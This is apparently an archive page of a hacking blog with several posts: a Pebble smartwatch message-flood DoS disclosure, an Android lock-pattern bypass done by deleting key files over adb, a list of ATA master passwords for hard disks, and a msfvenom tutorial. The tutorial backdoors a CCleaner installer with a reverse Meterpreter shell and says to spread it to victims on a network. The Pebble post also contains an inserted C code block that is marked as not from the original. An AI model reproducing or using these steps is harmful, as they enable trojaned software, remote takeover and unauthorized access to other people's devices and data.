
Tuesday, August 19, 2014

DoSing Pebble SmartWatch And Thus Deleting All Data Remotely



Pebble DoS Vulnerability

Hemanth Joseph
hemanthvjoseph@gmail.com

During my recent security research on the Pebble smartwatch and its Android/iOS application, I found one critical DoS vulnerability by which we can remotely delete all data, apps, notes, and other information stored on it.

About Pebble Smart Watches

The Pebble smartwatch is developed by Pebble Technology Corporation and was released in 2013. It is considered one of the best smartwatches available and is compatible with Android and iOS. Over 10 lakh units of Pebble had been sold as of July 2014.

 



Pebble DoS Vulnerability [POC]

A Pebble smartwatch, when connected to a phone, gives a vibrating alert for calls, messages, e-mails, etc. I'm testing a Pebble with its latest v2.4.1 firmware.

For every message from WhatsApp, Facebook Messenger or similar apps, the Pebble gives an alert with the whole message displayed on its screen. There is no character limit when showing such messages. Even if we get a lengthy 100-word message from WhatsApp, the Pebble will show the whole message on its small screen along with the alert. From this alone it is clear that we can make it freeze by giving it a lot of notifications to display. But what actually happened during my testing shows how serious this bug is.

What I Did Is

1. Connected my Pebble smartwatch to my Sony Z2.
2. Tested whether I was getting notifications or not.
3. Did a message bombing of my own WhatsApp account [1500 messages in 5 sec].

What All Ended Up With?

As expected, the whole screen of my Pebble became filled with lines (as shown in the picture). Soon it switched off automatically and executed a factory reset without any action from my side! Due to that automatic factory reset I lost all my apps and other data which I had on my Pebble.
The same occurred even when I decreased the number of messages to 300 in 5 sec.
By exploiting this DoS bug, a person with your FB ID or mobile number or any such thing can remotely DELETE all the data on your Pebble by simply sending you a small message bomb.

Possible Fix

· Give a character limit when showing such messages on the Pebble.
· Remove the automatic factory reset bug.
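
An added example, not from the original post and not Pebble firmware code: a sketch of the character limit proposed above, combined with a token-bucket rate limit (which goes beyond the post's two fixes) so that a flood is dropped instead of queued for display. The names `notif_gate`, `gate_accept`, `simulate_flood` and the limits (160 bytes, burst of 5, one alert per second) are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_BODY  160   /* assumed display limit in bytes */
#define BURST     5     /* assumed: alerts allowed back-to-back */
#define REFILL_MS 1000  /* assumed: one more alert allowed per second */

typedef struct {
    uint32_t tokens, last_ms, shown, dropped;  /* bucket state and counters */
    char body[MAX_BODY + 1];                   /* last displayed text, NUL-terminated */
} notif_gate;

void gate_init(notif_gate *g, uint32_t now_ms) {
    memset(g, 0, sizeof *g);
    g->tokens = BURST;
    g->last_ms = now_ms;
}

/* Returns 1 if the notification is displayed, 0 if it is dropped. */
int gate_accept(notif_gate *g, uint32_t now_ms, const char *msg, size_t len) {
    uint32_t earned = (now_ms - g->last_ms) / REFILL_MS;
    if (earned > 0) {           /* refill, never above BURST */
        g->tokens = (earned >= BURST - g->tokens) ? BURST : g->tokens + earned;
        g->last_ms += earned * REFILL_MS;
    }
    if (g->tokens == 0) { g->dropped++; return 0; }  /* flood: drop, do not queue */
    g->tokens--;
    if (len > MAX_BODY) len = MAX_BODY;              /* the character limit */
    memcpy(g->body, msg, len);
    g->body[len] = '\0';
    g->shown++;
    return 1;
}

/* Constructed flood: n messages of msg_len bytes spread evenly over span_ms. */
uint32_t simulate_flood(notif_gate *g, uint32_t n, uint32_t span_ms, size_t msg_len) {
    static char msg[4096];
    if (msg_len > sizeof msg) msg_len = sizeof msg;
    memset(msg, 'A', msg_len);
    gate_init(g, 0);
    for (uint32_t i = 0; i < n; i++)
        gate_accept(g, (uint32_t)((uint64_t)i * span_ms / n), msg, msg_len);
    return g->shown;
}

int main(void) {
    notif_gate g;   /* 300 messages in 5 s is the lower rate reported in the post */
    printf("shown: %u\n", (unsigned)simulate_flood(&g, 300, 5000, 2000));
    return 0;
}
```

At the post's lower rate of 300 messages in 5 seconds, this gate displays 9 alerts and drops the other 291, and each displayed body is cut to 160 bytes.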

 



**UPDATE**

After your Pebble freezes you will see a lot of straight white lines all over the screen. We can't bring it back to a working condition by simply switching it off; we MUST do a factory reset in order to make it work again. So it is certain that all your data will be deleted if your Pebble gets a DoS!
Thank you for reading.

Monday, December 2, 2013

How to Bypass Android Lock Pattern using Kali Linux



Requirements :
Kali Linux

An Android phone

USB cable


ADB Android Tool

Step 1.


1. First boot your Kali Linux distribution.

2. Connect your phone to your PC using a USB cable.

Step 2. 


1. Open up Terminal

For installing ADB over terminal

2. Boot into any Linux distro you have.

3. On your terminal type:


#sudo apt-get install android-tools-adb


This will install ADB Android Tool on your Kali Linux Machine.

Step 3. 


Disabling pattern unlock over terminal

1.Open up terminal again and type :


#adb devices
#adb shell
#cd data/system
#su
#rm *.key


Almost Done.

Now, disconnect your phone and reboot. Unlock pattern should be here. Just try some random gesture and it will get unlocked.

Monday, November 25, 2013

List of Hard Disk ata master Passwords.





Ferreted this out after some hours of web searching, we know most of our readers have gone through this situation of getting locked out of their own Hard Disk. Guess we can spare you the same trouble.

If you find this stuff useful, please do leave a comment, “hi, it worked” is enough.

Little Hacking Ideas thanks the Readers.



SEAGATE -> “Seagate” +25 spaces

MAXTOR
series N40P -> “Maxtor INIT SECURITY TEST STEP ” +1 or +2 spaces
series N40P -> “Maxtor INIT SECURITY TEST STEP F”
series 541DX -> “Maxtor” +24 spaces
series Athena (D541X model 2B) and diamondmax80 -> “Maxtor”

WESTERN DIGITAL -> “WDCWDCWDCWDCWDCWDCWDCWDCWDCWDCWD”

FUJITSU -> 32 spaces

SAMSUNG -> “ttttttttttttttttttttttttttttttttt” (32 times t)

IBM
series DTTA -> “CED79IJUFNATIT” +18 spaces
series DJNA -> “VON89IJUFSUNAJ” +18 spaces
series DPTA -> “VON89IJUFSUNAJ” +18 spaces
series DTLA -> “RAM00IJUFOTSELET” +16 spaces
series DADA-26480 (6,4gb) -> “BEF89IJUF__AIDACA” +15 spaces

HITACHI series DK23AA, DK23BA and DK23CA -> 32 spaces

TOSHIBA -> 32 spaces

For xbox hdds try “XBOXSCENE” or “TEAMASSEMBLY” too

Monday, August 26, 2013

Backdoor Windows Executables Using Metasploit's Plugin Msfvenom

In this tutorial, we will show you how to backdoor Windows executable (.exe) files using Metasploit Exploitation Framework's plugin Msfvenom (a combination of msfpayload and msfencode).

  Now follow step by step:

Attacker's IP: 192.168.0.14
Victim's IP: 192.168.0.x (within LAN network it might be any IP)


1- First download a Windows executable file. For example, we will take the ccleaner software installer file.

You can also use any setup file with the .exe extension.

2- I was in the root directory when I used the above command. So, putty got downloaded in the /root/ directory.
Now use msfvenom to backdoor this executable using the following command.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/ccleaner.exe LHOST=192.168.0.14 LPORT=4444 > evilcleaner.exe

The above command will generate an EXE file with the name evilcleaner.exe. This is our backdoored executable file.

3- Start Metasploit.

msfconsole

4- Start Metasploit's reverse handler to get a reverse connection.


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.14
set LPORT 4444
exploit

5- Distribute this evilcleaner.exe file in your LAN/Wifi network and wait for the victim. When the victim opens this evilcleaner.exe, you will get a reverse shell on your Metasploit handler.

Happy Hacking :)
 